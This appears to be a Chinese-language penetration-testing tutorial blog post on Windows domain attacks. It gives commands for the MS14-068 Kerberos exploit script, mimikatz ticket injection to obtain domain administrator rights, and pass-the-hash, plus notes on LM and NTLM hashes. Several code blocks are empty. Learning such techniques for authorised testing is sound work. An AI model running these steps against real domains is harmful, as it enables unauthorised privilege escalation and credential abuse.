域渗透入门(二)
参考资料
- 乌云文章:《使用Hash直接登录Windows》
- 维基百科Pass_the_hash的定义
- metasploit mimikatz
- Kerberos协议探索系列之票据篇:MS14068漏洞和Kerberos票据的利用说明
录制的视频教程
- 域信息搜集
- ms14-068 域普通用户提权到域管理员
- pass the hash票据传递攻击
Kerberos域用户提权漏洞ms14-068
准备域内普通用户权限(以及DC未打补丁)
域控添加一个user用户
192.168.1.3 计算机添加user用户
1
2
3
4
5net user user admin!@#45 #添加一个用户user,添加密码
---
注销管理员用户,登陆用户user
用户名:SRV-WEB-KIT\user
密码:admin!@#45测试域普通用户与域管理员区别
生成高权限票据
1
2
3
4python ms14-068.py -u whale@0day.org -s S-1-5-21-1812960810-2335050734-3517558805-1178 -d 192.168.1.131 -p qwe123$%
需要普通域用户名称
普通域用户sid
普通域用户明文密码或者hashmimikatz导入hash
1
2
3
4mimikatz.exe
kerberos::list #列出内存中的票据信息
kerberos::purge #清除内存中的票据信息
kerberos::ptc TGT_whale@rootkit.org.ccache(生成的高权限票据全名) #导入高权限票据到内存,获得域管理员权限票据传递
1 |
|
NT hash、LM hash、NTLM hash
LM hash的全名LAN Manager Hash,容易被破解。因此windows visa与winSever2008之后的版本默认禁用了LM hash。
NTLM hash取代了LM hash,安全性更高,从windowsSever2003开始,默认使用NTLM hash。
所说的NT hash就是NTLM hash,有些文档这么称呼,我还以为是两种不同的加密方式,只是称呼不同而已。
mimikatz提权ntlm hash
1 |
|
查看DC机器与Web机器的hash是否一致
1 |
|
1 |
|
1 |
|